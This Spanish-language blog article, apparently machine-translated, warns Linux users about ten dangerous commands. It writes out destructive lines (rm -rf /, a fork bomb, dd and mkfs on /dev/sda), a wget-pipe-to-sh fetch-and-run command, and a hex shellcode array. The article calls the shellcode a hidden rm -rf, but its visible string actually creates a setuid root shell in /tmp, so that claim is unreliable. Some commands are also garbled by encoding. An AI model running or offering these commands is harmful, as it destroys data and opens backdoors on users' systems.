Los 10 comandos más peligrosos: nunca debería ejecutarlos en Linux


La línea de comandos de Linux es productiva, útil e interesante, pero a veces puede ser muy peligrosa, especialmente cuando no está seguro de lo que está haciendo. Este artículo no pretende enfurecerlo con la línea de comandos de Linux o Linux. Solo queremos que conozca algunos de los comandos que debe pensar dos veces antes de ejecutarlos.

1. Comando rm -rf

El comando rm -rf es una de las formas más rápidas de eliminar una carpeta y su contenido. Pero un pequeño error tipográfico o ignorancia puede resultar en un daño irrecuperable del sistema. Algunas de las opciones utilizadas con el comando rm son.

  1. El comando rm en Linux se usa para eliminar archivos.
  2. rm -r comando elimina la carpeta de forma recursiva, incluso la carpeta vacía.
  3. El comando rm -f elimina "Archivo de solo lectura" sin preguntar.
  4. rm -rf /: fuerza la eliminación de todo en el directorio raíz.
  5. rm -rf *: fuerza la eliminación de todo en el directorio actual/directorio de trabajo.
  6. rm -rf. : Fuerza la eliminación de la carpeta y las subcarpetas actuales.

Por lo tanto, tenga cuidado al ejecutar el comando rm -rf. Para superar la eliminación accidental de un archivo con el comando "rm", cree un alias del comando "rm" como "rm -i" en el archivo ".bashrc", le pedirá que confirme cada eliminación.

2.:() {: |: &} ;: Comando

Lo anterior es en realidad una bomba de horquilla. Opera definiendo una función llamada ":", que se llama a sí misma dos veces, una en primer plano y otra en segundo plano. Sigue ejecutándose una y otra vez hasta que el sistema se congela.

:(){:|:&};:

3. comando>/dev/sda

El comando anterior escribe la salida del "comando" en el bloque/dev/sda. El comando anterior escribe datos sin procesar y todos los archivos del bloque serán reemplazados por datos sin procesar, lo que resultará en una pérdida total de datos en el bloque.

4. carpeta mv/dev/null

El comando anterior moverá la "carpeta" a/dev/null. En Linux/dev/null o null, el dispositivo es un archivo especial que descarta todos los datos escritos en él e informa que la operación de escritura se realizó correctamente.

# mv /home/user/* /dev/null

El comando anterior moverá todo el contenido de un directorio de usuario a/dev/null, lo que literalmente significa que todo lo que se envió a blackhole (nulo).

5. wget http:// malicioso_source -O- | sh

El comando anterior descargará un script de una fuente maliciosa y luego lo ejecutará. El comando Wget descargará el script y sh ejecutará el script descargado.

Nota: debe ser muy consciente de la fuente desde donde está descargando paquetes y scripts. Utilice únicamente aquellos scripts/aplicaciones que se descargan de una fuente confiable.

6. mkfs.ext3/dev/sda

El comando anterior formateará el bloque "sda" y seguramente sabrá que después de ejecutar el comando anterior, su Bloque (Unidad de disco duro) será nuevo, ¡A ESTRENAR! Sin ningún dato, dejando su sistema en una etapa irrecuperable.

7.> archivo

El comando anterior se usa para vaciar el contenido del archivo. Si el comando anterior se ejecuta con un error tipográfico o ignorancia como "> xt.conf" escribirá el archivo de configuración o cualquier otro sistema o archivo de configuración.

8. ^foo ^bar

Este comando, como se describe en nuestros 10 comandos de Linux menos conocidos, se usa para editar el comando de ejecución anterior sin la necesidad de volver a escribir todo el comando nuevamente. Pero esto puede ser realmente problemático si no se arriesgó a verificar minuciosamente el cambio en el comando original usando el comando ^foo ^bar.

9. dd if u003d/dev/random of u003d/dev/sda

El comando anterior borrará el bloque sda y escribirá datos basura aleatorios en el bloque. ¡Por supuesto! Su sistema quedaría en una etapa inconsistente e irrecuperable.

10. Oculto el comando

El siguiente comando no es más que el primer comando de arriba (rm -rf). Aquí los códigos están ocultos en hexadecimal para que un usuario ignorante pueda ser engañado. Ejecutar el siguiente código en su terminal borrará su partición raíz.

Este comando muestra que la amenaza puede estar oculta y normalmente no es detectable a veces. Debe ser consciente de lo que está haciendo y cuál sería el resultado. No compile ni ejecute códigos de una fuente desconocida.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Nota: No ejecute ninguno de los comandos anteriores en su terminal o shell de Linux o en la computadora de su amigo o de la escuela. Si desea probarlos, ejecútelos en una máquina virtual. Cualquier inconsistencia o pérdida de datos, debido a la ejecución del comando anterior, dañará su sistema, de lo cual ni el autor del artículo ni Tecmint son responsables.

Eso es todo por ahora. Pronto estaré aquí de nuevo con otro artículo interesante que a la gente le encantará leer. Hasta entonces Estén atentos y conectados a Tecmint. Si conoce otros comandos peligrosos de Linux y desea que los agreguemos a la lista, infórmenos a través de la sección de comentarios y no se olvide de dar sus valiosos comentarios.